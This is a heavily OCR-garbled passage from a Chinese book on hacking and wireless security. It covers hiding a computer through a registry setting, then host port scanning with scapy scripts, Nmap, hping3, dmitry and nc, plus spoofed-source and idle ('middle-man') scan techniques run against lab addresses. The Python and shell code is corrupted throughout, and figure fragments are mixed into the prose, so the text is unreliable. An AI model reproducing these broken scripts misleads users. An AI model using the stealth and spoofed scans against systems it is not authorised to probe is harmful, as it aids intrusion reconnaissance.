文件 夫 、 文 档 或 Internet 资源 . 


HF(O}: 
a 


浏览 (B).…. 


单 击 “确定 ”按钮 ， 打 开 “ 注 册 表 编 
辑 器 ”窗口 ， 如 下 图 所 示 。 


图 注册 表 编 辑 器 - 0 x 
文件 (R) ”编辑 (E) 查看 (V) 收藏 大 (A) 帮助 (H) 
v 国 计算 机 名 称 类 型 


| HKEY_ CLASSES ROOT 
| HKEY CURRENT_USER 
; -| | HKEY LOCAL MACHINE 
| | HKEY_USERS 
| | HKEY_ CURRENT_CONFIG 


在 “注册 表 编 辑 器 ”窗口 中 ， 展 开 分 
支 到 HKEY LOCAL MACHINE\SYSTEM\ 
CurrentControlSet\Services\LanManServer\ 


Parameters 选 项 下 ， 如 下 图 所 示 。 


甘 注册 二 峰 千 江 二 
文件 旧 。 据 缉 (E) 吾 土 (V) 收藏 六 (A) 才 世 (H) 
mleep ^ || 名 称 类 型 数 二 
: : -| KsecDD ED [Eu] REG 5SZ [ 数 信 未 设置 ) 
: : ~ Ksecpkg 区 AdjustedNullsessi.。 REG DWORD Ox00000003 [3) 
"| 3 KtmRm 位 autodisconnect REG_DWORD 0x0000000f (1 
| | 到 EnableaAuthenticat.。 REG DWORD 0x00000000 [0) 
器 Aiases 俩 jenabhleforcedlogoff REG DWORD OxDOO00001 [1) 
po 到 cnablesecurigsign.。 REG_DWORD 0x00000000 [0) 
- 国 Linkage 襄 |Guid REG BINARY bo 1e 85 4e 02 
全 A a 站 NullSessionPipes REG_MULTI SZ 
:- 国 FsciiAllowist requiresec rkysigu, REG DWOND Ox00000000 [0) 
| Shareproviders 由 restrictnullsessacc- REG DWORD Dx00000001 (1) 
国 Shares 3]serviceDI REG_EXPAND_SZ %SystemRoot 
量 tanmanWorkstation | 国 Seiceplunicado-，REG_owomD Doooooom [1) 
: |: > -ldap Cadden RGST 0 .| 
i | “lfsvc 
| -| LicanseManager 
i i | lktdio 
:| -| lltdsve 
: : 国 Imhosts v 
< | | > 法 > 


计 妆 宙 NHKEY LOCAL MACHINEVYSYSTEM\CurrentControlSet\Services\LanmanServer\Parameters 
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选中 Hidden 选 项 并 右 击 ， 从 弹出 的 快 
捷 菜 单 中 选择 “修改 ”菜单 项 ， 打 开 “ 编 
辑 字 符 串 ”对 话 框 ， 如 下 图 所 示 。 

Wm x 


数值 名 称 (N): 


Hidden 


数值 数据 (V): 


CO 
[ww | ™ 


在 “数值 数据 ”文本 框 中 将 dword 类 
键 值 从 0 设置 为 1]， 如 下 图 所 示 。 


编 强 字符 这 xX 


数值 名 称 (N): 
数值 数据 (V): 


和， 一 
a 


单 击 “ 确 定 ” 按 钮 ， 就 可 以 在 “网 
络 邻 后 ”中 隐藏 自己 的 计算 机 ， 如 下 图 
所 示 。 


只 | 加 由 :1 PR = ”二 时 


~ 计算 机 (2) 


I 网 络 科技 


[四 DESKTDP-D5KF15E 


项 快速 访问 


~ 国 此 电脑 
，、 阐 视频 
”车 | 图 片 
EE 
电工 
小 问 
>》 国 点 面 
2 Windows10 (C: 
”二 软件 (D:) 
”各 文档 (5 
二 本 地 磁盘 (F:] 
3 个 项 目 :== 区 | 


Y 网 络 论 施 (1) 


we Wireless N Router TL-WR886N 


Y 


小 试 身 手 


认识 扫 摘 工具 Nmap。 

使 用 工具 进行 二 层 扫描 。 
使 用 工具 进行 三 层 扫描 。 
使 用 工具 进行 四 层 扫描 。 


10.6 


练习 1: 
练习 2: 
练习 3: 
练习 4: 


第 11 草 ”扫描 无 线 网 络 中 的 主机 


不 同 的 服务 通过 不 同 的 端口 提供 服务 ， 先 识别 主机 中 开放 了 哪些 端口 ， 再 根据 端口 确 


定 主机 开放 了 哪些 服务 。 本 章 介 


绍 如 何 对 无 线 网 络 中 的 存活 主机 进行 各 种 扫描 ， 主 要 和 包括 


扫描 UDP 端 口 、 打 描 TCP 端 口 、 打 描 Banner 信 息 、 打 描 SNMP 协 议 等 。 


11.1 扫描 主机 端口 


如 果 把 IP 地 址 比 作 一 间 房 子 ， 端 口 就 
是 出 入 这 间 房 子 的 门 。 真 正 的 房子 只 有 几 
个 门 ， 但 是 一 个 IP 地 址 的 端口 可 以 有 65536 
个 之 多 。 端 口 是 通 过 端口 号 来 标记 的 ， 范 
围 是 从 0 到 65535。 每 一 个 端口 对 应 一 个 网 
络 应 用 或 应 用 端 程序 ， 因 此 ， 黑 客 通过 开 
放 的 端口 可 以 入 侵 系 统 漏 洞 ， 所 以 发 现 主 
机 开放 的 端口 就 变 得 尤为 重要 。 


11.1.1 扫描 UDP 站 口 


扫描 UDP 端口 与 扫描 UDP 主机 是 不 同 
的 ， 虽 然 使 用 的 技术 相同 。 扫 描 UDP 端 口 
只 针对 目标 主机 不 咽 应 ， 以 此 判断 UDP 端 
口 打 开 ， 而 对 于 有 啊 应 则 认定 是 没有 开放 
UDP 应 口 。 


1. scapy 工 具 


使 用 scapy 编 写 python 脚 本 目 动 化 端口 
扫描 程序 ， 有 具体 代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger(" "scapy.runtime"). 
setLevel (logging .ERROR) 
From Seapnv .all Tort 二 
import time  # 导 入 时 间 库 
import sys # 导 入 系统 库 
If lenl(sys.argv) !=4: 
# 如 果 输 入 的 参数 不 是 4, 做 出 提示 
print"Usage “udp liseoan ort py 
[Target -IP] [Fiest Port] [Last Port]" 
print ”Example dnsearn port 
下 7: og Wt We 


print “Example will UDP port Scan 
BOrES EDroogh LO0 om 192 BT 
sys.exit() 
ip = sys.argv[1] # 取 出 参数 中 的 IP 地 址 
portl1 = int(sys.argv[l2]) 
# 取 出 参数 中 的 第 一 个 端口 号 
port2 = int (sys.argv[3]) 
# 取 出 参数 中 的 第 二 个 端口 号 
for port in range (port]l,port2): 
# 以 给 定 端口 的 范围 进行 扫描 
# 构 建 UDP 数 据 包 进 行 发 送 
a = srl(IP(dst=ip) /UDP (dport=port), 
timeout=0.1,verbose=0) 
time.sleep (1)# 延 时 1s 


if a==None :# 如 果 没 有 返回 数据 认为 端口 开放 ges me 


print port# 将 该 端口 打印 输出 
else: 
pass 


应 用 上 述 编码 ， 
端口 信息 。 


可 以 扫描 主机 开放 的 


2. Nmap 工 具 


使 用 Nmap 工 具 可 以 扫描 UDP 端口 ， 具 
体操 作 步 骤 如 下 : 
使 用 Nmap -sU 192.168.1.103 命 令 ， 扫 
描 主 机 IP 地 址 为 192.168.1.103 的 端口 信息 ， 
执行 效果 如 下 图 所 示 。 如 果 没有 指定 端口 
号 ， 默 认 情 况 下 ，Nmap 会 扫描 常用 的 1000 
个 端口 己 。 


root@kali:~# nmap -SU 192.168.1.103 
starting Nmap 7.79 ( https:yvrnmap.org ) at 2018-19-26 94:97 EDT 
Nmap scan report for 192.168.1.103 
Host is up (0.0030s latency). 
Not shown: 992 closed ports 

STATE SERVICE 
123/udp open ntp 
137/udp open netbios-ns 
138/udp open|filtered netbivs-dgm 
445/udp open|filtered microsoft-ds 
566/vudp open|filtered isakmp 
1025/udp open|filtered blackjack 
1980/udp open|filtered upnp 
4560/udp open|filtered nat-t-ike 
MAC Address: 00:0C:29:A2:4E:97 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds 


ee 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


指定 端口 进行 扫描 ， 使 用 Nmap -sU 
192.168.1.103 -p 123 命 令 。 如 果 端 口 开 放 ， 
执行 效果 如 下 图 所 示 。 
root@kali:~# nmap -SU 192.168.1.1063 -p 123 
starting Nmap 7.70 ( https://,nmap.org ) at 2018-10-26 04:13 EDT 


Nmap scan report for 192.168.1.103 
Host jis up (6.00034s Latency | . 


PORT STATE SERVICE 
123/udp open ntp 
MAC Address: 00:0C:29:A2:4E:07 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds 


使 用 Nmap -sU 192.168.1.103 -p 888 命 
邻 ， 如 果 端 口 不 开放 ， 执 行 效果 如 下 图 所 
示 。 如 果 需 要 扫描 多 个 端口 使 用 “-” 进 行 
分 割 ， 如 -p 1-65535， 进 行 全 端口 打 描 。 


root@Kkali:~# nmap -SU 192.168.1.103 -p 888 
starting Nmap 7.70 ( https:/,nmap.org ) at 2018-10-26 04:15 EDT 


Nmap Scan report for 192.168.1.103 
Host is Up (6.00048s Latency | . 


PORT STATE “SERVICE 
888/udp closed accessbuilder 
MAC Address: O00:0C:29:A2:4E:97 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds 


侈 提示 : Nmap 还 支持 从 文件 中 读 取 地 址 列 
表 进 行 端口 扫描 ， 使 用 的 命令 为 Nmap -iL 
addr.txt -SU -p 1-333。 


再 11.1.2 ”扫描 TCP 端 口 


3 扫描 TCP 端 口 要 比 扫描 UDP 主机 复杂 ， 

它 是 基于 TCP 连 接 协 议 的 扫描 ， 其 中 包括 
隐蔽 扫描 、 全 连接 扫描 、 中 间 人 扫描 ， 这 
些 众多 扫描 方式 都 是 基于 三 次 握手 的 变化 
来 完成 的 。 


1. 隐 贡 扫 摘 


隐蔽 扫描 主要 是 通过 向 目标 主机 特定 
端口 发 送 SYN 包 。 如 果 目 标 主机 回复 RST 数 
据 包 ， 隐 蔽 扫描 则 根据 回复 数据 包 ， 来 判 
断 主 机 端口 是 否 开 放 ， 由 于 没有 建立 完整 
连接 ， 所 以 应 用 日 志 不 记录 扫描 行为 ， 从 
而 达到 一 定 程 度 的 隐蔽 。 

(1) scapy 工 具 。 使 用 scapy 实 施 隐 
蔽 扫描 ， 使 用 a=sr1(IP(dst="192.168.1.1")/ 
TCP(flags='S'), timeout=1) 命令 ， 给 目标 主 
机 发 送 SYN 包 ， 目 标 主 机 回复 SYN/ACK 
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数据 包 ， 使 用 wirshark 抓 包 可 以 看 到 除 此 
之 外 还 多 出 一 个 RST 数据 包 ， 这 是 由 于 操 
作 系 统 不 知道 SYN 包 的 发 送 ， 因 此 当 目 标 
主机 发 送 SYN/ACK 时 便 自动 回复 RST 数 
据 包 ， 执 行 效 果 如 下 图 所 示 。 


Destination Protocol Length Info 
192.168.1.1 TCP 54 20 — 8 [SYN] Seq=B Win=8192 Len=@ 
192.168,1.181 TCP 6B 5650 ~ 2B [SYN, ACK] Seq=g Ack=1 Win=16384 Len=B MSS=1466 


这 里 给 出 一 段 python 肢 本 实现 TCP 自 动 
扫描 的 代码 ， 具 体 代 码 如 下 : 


#!/usr/bin/python 


import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (lo0gging .ERROR) 
from scapy.all import * 
import sys 
If lenl(sys.argv) !=4: 
# 如 果 输 入 参数 不 是 4, 做 出 提示 
BFEinE” Usagene avn scampy Tiarget 
-TPI1iFirst PortllLast Bo 
Brint EXamplie 
192.1681-01 1 100” 
print "Example will TCP SYN scan port 
sean DOrESsS 1 EDoogn I0U on 192.108.1-1°" 
SYS .exit () 
ip = sys.argv[1]# 获 取 IP 地 址 
portl = int (sys.argv[2])# 获 取 起 始 端 口 
port2 = int (sys.argv[3])# 获 取 结 束 端 口 
for port in range (portl,port2}: 
# 循 环 遍 历 端口 区 段 
# 构 造 TCP 数 据 包 并 发 送 
a = srl(IP(dst=ip)/TCP (dport=port), 
timeout=0.1,verbose=0) 


# 如 果 数 据 为 空 不 做 处 理 


A Sv sedn 


if a==None: 
pass 
else: 
if int (a[lTCP] .flags==18): 
# 判 断 返 回 数据 包 TCP 标 记 为 18, 即 SYN/ACK 
print port  # 打 印 出 端口 
else: 
pass 


(2) Nmap 工具 。 使 用 Nmap 扫描 相对 
比较 简单 ， 直 接 使 用 工具 ， 然 后 添加 啊 应 
的 参数 ， 即 可 完成 扫描 。 有 共 体 的 方法 为 : 
使 用 Nmap 192.168.1.103 -p 1-200 命令 扫 
描 ， 默 认 情 况 下 ，Nmap 工具 使 用 SYN 方 
式 来 扫 摘 端口 。 扫 描 结果 如 下 图 所 示 。 


root@kali:~/Test/port# nmap 197.168.1.163 -p I-205 

starting Nmap 7.79 ( https://nmap.org ) at 2018-10-26 65:37 EDT 
Nmap scan report for 192.168.1.103 

host is up (9.000335 Latency 1 ， 

Not shown: 198 closed ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

MAC Address: ODO:0C:29:A2:4E:097 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds 


另外 ， 可 以 使 用 Nmap -sS 192.168.1. 
103 -p 1-200 命 令 ， 指 定 使 用 SYN 包 的 方式 
进行 扫描 ， 其 扫描 结果 是 一 样 的 。 还 可 以 
使 用 Nmap -sS 192.168.1.103 -p 1-65535 或 
Nmap -sS 192.168.1.103 -p- 命 令 ， 实 现 全 端 
口 扫 描 。 


倍 提 示 : 如 果 目 标 主 机 被 防火 墙 过 滤 ， 
可 能 会 有 一 些 非 open 状 态 的 端口 被 显示 ， 
此 时 可 以 通过 加 入 --open 进 行 过 滤 ， 只 显 
示 open 状 态 的 端口 。 如 果 有 多 个 不 连续 的 
端口 可 以 使 用 “， ”进行 分 隔 ， 如 “80， 
85，135” 这 样 。 

(3)hping3 工具 。 使 用 hping3 192.168.1. 
103 --scan 100-200 -S 命令 ， 实 现 对 100 一 200 
端口 扫描 ， 使 用 SYN 包 的 方式 ，hping3 显 
示 出 来 的 结果 条 例 更 清晰 一 些 。 类 似 表格 
的 形式 如 下 图 所 示 。 


root@kali:~/Test/port# hping3 192.168.1.103 --scan 100-200 -9 
Scanning 192.168.1.103 (192.168.1.103), port 100-2860 
161 ports to scan, Use -V to see all the replies 

小 -~--- 二 -----------+--------- 十 ---+----- +----- +----- 十 


|port| serv name | flags |itl| id | win | len | 
上----+----------- +--------- +---+----- +----- +----- 十 
135 Loc-Srv : .5..A.. .128 14687 16616 46 
139 netbios-ssn: .5..A... 128 15111 16616 46 


ALL repLies received.， Done . 
Not responding ports : 


另外 ， 使 用 hping3 -c 200 -S --spoof 
192.168.1.155 -p ++1 192.168.1.103 命 令 ， 实 
现 欺骗 扫描 。 

从 1 这 个 端口 开始 扫 摘 ， 每 次 端口 
加 1 总 共 发 送 200 个 数据 包 ， 伪 造 地 址 
“192.168.1.155”， 要 扫描 的 目标 地 址 为 
“192.168.1.103”， 这 样 做 的 优点 是 隐 
项 ， 缺 点 是 本 机 无 法 查看 到 结果 ， 可 以 
通过 交换 机 镜像 端口 ， 或 者 是 有 权 查 看 
192.168.1.155 才 可 以 。 


2. 全 连接 扫 摘 
直接 与 目标 主机 建立 三 次 握手 ， 如 果 
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能 够 建立 三 次 握手 证 明 主 机 端口 开放 。 全 
连接 扫描 的 优点 是 结果 准确 ， 缺 点 是 完 
骏 露 没有 隐蔽 。 

(1) scapy 工具 。 直 接 使 用 脚本 建立 三 
次 握手 ， 具 体 代码 如 下 : 


#!/usr/bin/python 

Import logging 

import subprocess 

logging.getLogger("scapy.runtime"). 
setLevel (lo0ogging .ERROR) 

from scapy.all import * 

# 发 送 SYN 包 

response = srl(IP(dst="192.168.1.1") 
/TCP (dport=80,flags="'S")) 

# 第 二 次 发 送 使 用 目标 主机 返回 的 seq 值 将 其 +1 处 
理 ， 这 样 构成 一 个 完整 通信 

reply = sri(iPldst="192 LDL LT 
TCP (dport= 80,flags='A',ack=(response 
[TCP] .seq+1))) 


提出 猜想 ， 之 前 通过 发 送 数 据 包 了 解 
到 ， 系 统 会 自动 回复 RST 包 ， 修 改 脚本 验证 
猜想 ， 使 得 发 送 数据 显示 出 来 。 修 改 后 的 
代码 如 下 : 


#!/usr/bin/python 
Import logging 
Import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
# 构 造 SYN 包 
SNHN= EPE(Idst es Tq LOB 1 Ly 
TCP (dprot=80,flags="S") 
DeLnt | — SENT = 
# 在 终端 打印 出 一 个 发 送 标记 
SYN.display() # 在 终端 显示 数据 包 内 容 
EPEOE nn RECELIVED 
# 在 终端 打印 发 送 结束 标记 
response = srl(SYN,timeout=1, 
Verbose=0)  # 将 构造 好 的 SYN 包 发 送出 去 
reSpPonse .display() 
# 在 终端 打印 返回 的 数据 包 
if int (response[TCP] .fags) ==18 : 
# 判 断 回复 的 是 否 为 SYNVRCK 
下 
# 再 次 打印 发 送 标记 
# 构 造 返 回 包 
A = IP(dst="192.168.1.1") /TCP (dport= 
80,flags="A',ack= (response [TCP] .seql+1)) 
A.display() # 展 现 构造 好 的 数据 包 
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print"\n\n-- RECEIVED --"# 打 印 结束 标记 #%#[ Pj## HT 人 1 
version = = p 
response2=srl1 (A,timeout=1,verbo ihl = 5 dport = ftp data 
> 和 tos = 09X9 Seq = 3865475985 
se=0) # 将 构造 好 的 数据 包 发送 人 二 
response2.display()# 在 终端 打印 返回 数据 包 id = 39496 dataofs =5 
下 flags 一 reserved = 9 
esSe frag = 自 flags = R 
print"SYN-ACK not returned ttl = 64 reat =0 
proto = tcp chksum = Oxc9cd 
# 如 果 端 口 不 开放 , 打印 提示 chksum = Qx5cdl urgptr =0 
加 src = 192.168.1.1 options = [] 
使 用 上 述 代 人 码 进 行 扫 描 的 操作 步 双 dst = 192.168.1.101 ###[ Padding ]### 
\options _\ load = '\xQ0\x00\x00\xQ0\x00\x00 


如 下 : 


I 包 诵 信 站 
[see 图 发 送 第 一 个 SYN 数 据 包 ， 如 下 图 step 图 使 用 Wirshark 抓 包工 具 抓 取 通 信 过 


程 ， 再 次 验证 猜想 ， 可 以 发 现 有 5 个 数据 


所 示 。 本 , 本 

本 包 ， 主 机 发 送 SYN 数 据 包 ， 目 标 主机 回复 

异 产 枯 [ IP ] # 形 ## ， ###[ TCP | es SYN/ACK 数 据 包 9 操作 系 统 , 回 复 RST 数 
version = spor = ftp data 
tht = Wone dport = http 据 包 ， 此 时 已 经 中 断 连接 ， 主 机 再 次 发 送 
tos = DOX9 seq = 0 
ee re ACK 数 据 包 ， 目 标 主机 回复 RST 数 据 包 ， 
fl = d =0 、 孟 4、 一 
re dt 整个 通信 过 程 如 下 图 所 示 。 
0 te TTT 
chksum = None urgptr =0 T9316. 20 [SYh, AEKT Seq-d AckcT Min-16384 Len=B MSS=1469 
src = 192.168.1.101 options = [] . | 
dst = 192.168.1.1 
\options \ -- RECEIVED -- 


使 用 iptables -A OUTPUT -p tcp --tcp- 
flags RST RST -d 192.168.1.1 -] DROP 命 令 ， 


系统 自 带 防火 墙 设置 过 滤 ， 但 不 自动 发 送 


这 时 会 返回 SYN/ACK 数 据 包 内 容 ， 
如 下 图 所 示 。 


岩 郑 帮 [ IP 开光 下 ###[ TCP ]### 上 
version = 4 sport = http RST 数 据 包 , o 使 用 iptables - 工 命令 ， 检 查 防 
ihl = 5 dport = ftp data 
tos = exg seq = 3865475985 火 墙 规 则 是 否 生 效 ， 如 下 图 所 示 。 
len = 44 ack = 1 
id = 39495 dataofs = 6 FootgKaUiI:=-7Test7rportg iptables -TC 
flags = DF reserved = 0 chain INPUT (policy ACCEPT) 
frag = 9 flags = SA Karget prot opt source destination 
ttl = 64 window = 16384 Fhain FORWARD (policy ACCEPT) 
proto = tcp chksum = OxXx7202 karget prot opt Source destination 
chksum = Oxlcce urgptr =0 | | 

， Fhain OUTPUT (policy ACCEPT) 
src = 192.168.1.1 options = [('MSS', 1466)] karget prot opt source destination 
dst = 192.168.1.101 ###[ Padding ]### DROP tcp -- anywhere gateway tcp flags:RST/RST| 
\options \ load = '\xO0\x00' 


再 次 运行 脚本 ， 查 看 最 后 一 次 返回 数 
据 ， 如 下 图 所 示 。 由 此 看 来 三 次 握手 正常 
建立 。 


此 时 满足 条 件 ， 因 此 构建 第 二 个 ACK 
数据 包 ， 如 下 图 所 示 。 


洪 ##[ IP ]### ###[ TCP ]### 尖 ##[ IP ]### 天 站 [ TCP 天才 
version = 4 sport = ftp_data version =4 sport = http 
ih\ = None dport = http ihl = 5 dport = ftp _ data 
tos = QOx0 seq =0 tos = 9x9 seq = 805120079 
Len = None ack = 3865475985 Len = 40 ack = 1 
jd = 1 dataofs = None id = 40580 dataofs =5 
flags reserved =0 flags = DF reserved =0 
加 fla = A frag = 0 flags = A 
frag 本 划 9> tt1 = 64 window = 16384 
= window = 8192 
tt\ = 64 proto = tcp chksum = Ox936cC 
proto = tcp chksum = None chksum = 9x1895 urgptr =0 
chksum = None urgptr = 0 src = 192.168.1.1 options = [] 
src = 192.168.1.161 options = [] dst = 192.168.1.101 |###[ Padding ]### 
dst = 192.168.1.1 -- RECEIVED -- \options \ load = '\x00\xQO0\xOO\xOO0\xXOO0\x00 
\options \\ 


通过 Wirshark 抓 包工 具 抓 取 通 信 过 
程 ， 如 下 图 所 示 。 


192.168.1.1 TCP 54 28 -= 86 [SYN] Seq=6 Win=8192 Len=B 
192 .165 ,1.191 TCP 6 588 ~ 29 [SYN, ACK] Seq=8 Ack=1 Win=16384 Len= MSS=1468 


构建 完成 后 ， 返 回 的 数据 包 如 下 图 
所 示 。 
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(2) Nmap 工具 。Nmap 工具 本 身 目 带 
了 全 连接 扫 拉 功能， 用户 使 用 简单 的 命令 
配置 即 可 完成 TCP 端口 扫描 ， 有 具体 的 操作 
步骤 如 下 : 
使 用 Nmap -sT 192.168.1.103 -p 135 命 
令 ， 对 主机 特定 端口 实施 全 连接 扫描 ， 如 
下 图 所 示 。 


rFoot@kali:~# nmap -ST 192.168.1.163 -p I35 
Nmap 7.70 ( https://,nmap.org ) at 2018-10-26 22:23 EDT 
map scan report for 192.168.1.103 

Host is up (6.00035s Latency 1 . 


PORT STATE SERVICE 
135/tcp open msrpc 
MAC Address: 00:90C:29:A2:4E:07 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds 


使 用 Nmap -sT 192.168.1.103 -p 1-200 
命令 ， 可 以 对 区 间 的 端口 进行 扫描 ， 如 下 
图 所 示 O 


oot@kali:~# nmap -sT 192.168.1.103 -p 1-200 
tarting Nmap 7.79 ( https://nmap.org ) at 2018-10-26 22:29 EDT 
map Scan report for 192.168.1.103 

ost is Up (686.0019s latency). 

ot shown: 198 closed ports 

ORT STATE SERVICE 

35/tcp open msrpc 

39/tcp open netbios-ssn 

AC Address: 00:9C:29:A2:4E:07 (VMware) 


map done: 1 IP address (1 host up) scanned in 0.17 seconds 


使 用 Nmap -sT 192.168.1.103 -p 
135$.445$.$$5 人 命令 ， 对 一 组 端口 进行 扫描 ， 
如 下 图 所 示 。 


Foot@Katli:~# nmap -ST 1I92.1I68.I.1I03 -pp I35 ,445 ,555 
和 Nmap 7.70 ( https://,nmap.org ) at 2018-10-26 22:27 EDT 
map Scan report for 192.168.1.103 

Host is up (6.9000485 Latency ) . 


PORT STATE 
135/tcp open msrpc 

445/tcp open microsoft-ds 

B55/tcp closed dsf 

MAC Address: 00:0C:29:A2:4E:07 (VMware) 


SERVICE 


Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds 


如 果 没 有 提供 端口 ， 默 认 情 况 下 
Nmap 会 自动 扫描 1000 个 常用 端口 ， 如 下 图 
所 示 。 


root@kali:~# nmap -sT 192.168.I.163 
starting Nmap 7.79 ( https://nmap.org ) at 2018-10-26 22:31 EDT 
Nmap scan report for 192.168.1.103 
Host is up (0.0025s latency). 

Not shown: 996 closed ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

A45/tcp open microsoft-ds 

2869/tcp open icslap 

MAC Address: 900:0C:29:A2:4E:07 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds 


(多 提示 : 通过 Nmap -sT -iL addrtxt -p 80 命 
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(3) dmitry 工具 。dmitry 工具 的 功能 简 
单 ， 使 用 起 来 不 用 配置 太 多 参数 ， 默 认 150 
个 常用 端口 。 使 用 dmitry 工具 进行 扫描 的 
操作 步骤 如 下 : 
[step 图 输入 dmitry 命 令 ， 可 以 查看 该 工具 的 
参数 信息 ， 执 行 效果 如 下 图 所 示 。 


root@Kkali:-# dmitry 
Deepmagic Information Gathering TooL 
"There be some deep magic going on" 


Nsage: dmitry [-winsepfb] [-t 8-9] [-o shost.txt] host 
-0 Save output to %host .txt or to file specified by -0 file 
| Perform a whois looxup on the IP address of a host 

W Perform a whois looxup on the domain name of a host 

n Retrieve Netcraft.com information on a host 

S Perform a Search for possible subdomains 

已 Perform a search for possible email addresses 
-p Perform a TCP port scan on a host 

二 Perform a TCP port scan on a host Showing Dutput reporting filtered ports 
-b Read in the banner received from the scanned port 
-t 9-9 Set the TTL in seconds when scanning a TCP port ( Default 2 ) 
q 


使 用 dmitry -p 192.168.1.103 命 令 ， 实 
现 常用 150 个 端口 的 扫描 ， 如 下 图 所 示 。 


root@kali:~# dmitry -p 192.168.1.163 
pa Information Gathering Tool 
'There be some deep magic going on" 


ERROR: Unable to Locate Host Name for 192.168.1.103 
ontinuing with limited modules 
ostIP:192,160.1.103 

ostName: 


Gathered TCP port information for 192.168.1.103 


Port State 
L135/tcp open 
139/tcp open 


Portscan Finished: Scanned 150 ports, 147 ports were in state closed 


All scans completed, exiting 


(4) nc 工具。 nc 工具 也 有 一 个 扫描 的 
功能 ， 使 用 nc -nv -wl -z 192.168.1.103 1-1000 
命令 可 以 对 指定 端口 区 间 进 行 扫 描 ，nec 扫 
描 的 结果 除 给 出 端口 外 ， 还 给 出 了 可 能 
用 的 服务 名 称 ， 如 下 图 所 示 。 


oot@kali:~# nc -NV -wl -Z 192.168.1.1603 1-1000 
(UNKNOWN) [192.168.1.103] 445 (microsoft-ds) open 
(UNKNOWN) [192.168.1.103] 139 (netbios-ssn) open 
(UNKNOWN) [192.168.1.103] 135 (loc-srv) open 


在 扫描 命令 中 ，-nv 表 示 后 面 给 出 的 是 
一 段 IP 地 址 ， 不 做 域名 解析 ; -wl 是 设置 超 
时 时 间 1s; -z 是 进行 扫描 。 

nc 还 可 以 写成 脚本 的 形式 ， 具 体 代码 
如 下 : 


# 循 环 取出 139-200 的 端口 进行 扫描 最 后 过 滤 出 
open 状 态 的 端口 

for x in Slseq 139 200};d0 nc =nv ~w 
I 1902 160 1 0103 Sxsdonel 


grep open 
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还 可 以 写成 扫描 IP 地 址 段 ， 具 体 代码 
如 下 : 
# 循 环 取 出 1-254, 扫描 该 区 段 IP 指 定 端 口 


for x nlseg 2 do ne nv ml 
=Z 192.168.1.95x 80;done 


3. 中 间 人 扫描 


中 间 人 扫描 《也 称 为 僵尸 扫描 ) 扫描 
方式 极度 隐蔽 ， 但 是 实施 条 件 苛 刻 。 首 先 
扫描 方 允 许 伪 造 源 地 址 ， 其 次 需要 有 一 台 
中 间 人 机 器 。 中 间 人 机 器 需要 具备 如 下 两 
个 条 件 : 

第 1 条 : 在 网 络 中 是 一 个 闲置 的 状态 ， 
没有 三 层 网 络 传输 。 

第 2 条 : 系统 使 用 的 IPID 必 须 为 递增 形 
式 的 才 可 以 ， 不 同 的 操作 系统 IPID 是 不 同 
的 ， 如 有 的 是 随机 数 。IPID 是 IP 协 议 中 的 
Identification 字 7 段 ， 如 下 图 所 示 。 


v Internet Protocol Version 4, Src: 192.168.1.1696，Dst: 166.120.166.185 
619 .. i 


-- B11 = Header Length: 28 bytes (5) 
» Differ er ee Field: OQx@Q (DSCP: CSO, ECN: Not-ECT) 


Total Length : 
TT ELE) TT ELE) 9249 LIPID 


» Flags: Bx40600, Don't fragmen 
Time to live: 128 
Protocol: TCP (6) 
Header checksum: Ox03c1 [validation disabled] 
[Header checksum status: Unverified 
Source: 192.168 .1.109 
Destination: 166.120.166.1D95 


中 间 人 扫描 实现 的 原理 ， 如 果 需 要 分 
解 成 步 又， 可 以 分 为 如 下 几 个 步骤 : 
扫描 者 向 中 间 人 机 器 发 送 一 个 SYN/ 
ACK 数 据 包 ， 此 时 中 间 人 机 器 会 回复 一 个 
RST 数 据 包 。 这 个 RST 数 据 包 中 便 和 包含 IPID 
值 ， 记 录 IPID 值 。 
扫描 者 向 目标 主机 发 送 SYN 数 据 包 。 
此 时 SYN 中 的 源 地 址 为 伪造 地 址 (中 间 人 
机 器 地 址 ) ， 如 果 目 标 主机 端口 开放 便 会 
向 中 间 人 机 器 发 送 SYN/ACK 数 据 包 ， 中 间 
人 机 器 会 给 目标 机 回复 RST 数 据 包 ， 此 时 
IPID+1 进 行 递 增 。 

如 果 目 标 主机 端口 没有 开放 ， 目 标 主 
机 会 给 中 间 人 机 器 发 送 RST 数 据 包 ， 中 间 人 
不 予 回 应 ，IPID 保 持 不 变 。 
扫描 者 再 次 向 中 间 人 机 器 发 送 SYN/ 
ACK 数 据 包 ， 等 待 回复 RST 数 据 包 以 获取 
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IPID 值 。 拿 到 这 个 IPID 值 进行 比 对 ， 如 果 
IPID 值 为 IPID+2， 则 证 明 目 标 主机 端口 开 
放 ， 否 则 目标 主机 端口 未 开放 。 

(1) scapy 工具 。 使 用 scapy 实现 中 间 
人 扫描 。 首 先 需要 对 中 间 人 主机 检验 ， 有 具 
体操 作 步 又 如 下 : 
构建 发 送 给 中 间 人 的 数据 包 ， 如 下 图 
所 示 。 
>>> 1=IPT) 
>>> t=TCP() 
>>> rm=(i/t) 
>>> rm[IP].dst = "192.168.1.103" 
>>> rm[TCP] .flags = 'S' 
>>> Srl(rm).display!() 
Begin emission: 


.Finished sending 1 packets. 
+ 


Received 2 packets, got 1 answers, remaining 0 packets 


查看 返回 数据 包 中 的 IPID 值 ， 如 下 图 


所 示 。 

凑 ###[ IP ]#### ###[ TCP ]### 
version= 4 sport= http 
ihl= 5 dport= ftp data 
tos= 0X9 IPID Seq= 0 

ack= 1 

dataofs= 5 
reserved= 0 
flags= RA 
window= 0 

proto= tcp chksum= Ox2b4f 

chksum= Qxa556 urgptr= 0 

src= 192.168.1.103 options= [|] 

dst= 192.168.1.101 ###[ Padding ]### 

\options\ load= ' FHEPF 


再 次 发 送 相 同 数据 包 给 中 间 人 机 器 ， 
